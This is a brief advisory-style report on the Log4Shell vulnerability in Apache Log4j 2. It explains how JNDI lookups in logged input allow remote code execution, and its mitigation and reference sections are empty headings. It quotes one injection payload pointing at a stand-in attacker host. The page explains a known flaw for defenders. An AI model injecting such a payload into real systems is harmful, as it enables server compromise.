Image of Information Security Expert

Log4Shell - CVE-2021-44228 Exploit Report

Overview
Log4Shell (CVE-2021-44228) is a critical remote code execution (RCE) vulnerability in Apache Log4j 2, a widely used Java logging library. Discovered in December 2021, it allows unauthenticated attackers to execute arbitrary code on vulnerable servers by abusing JNDI lookups via user-controlled input.
Technical Details
Log4j versions 2.0 to 2.14.1 allowed lookups using the Java Naming and Directory Interface (JNDI). Attackers could inject payloads like ${jndi:ldap://attacker.com/a} into log messages. These messages, when logged, would cause the vulnerable server to fetch and execute remote Java classes from the attacker's server, leading to full compromise.
MITRE ATT&CK Mapping

View this mapping using official MITRE ATT&CK Navigator
Detection and Mitigation
References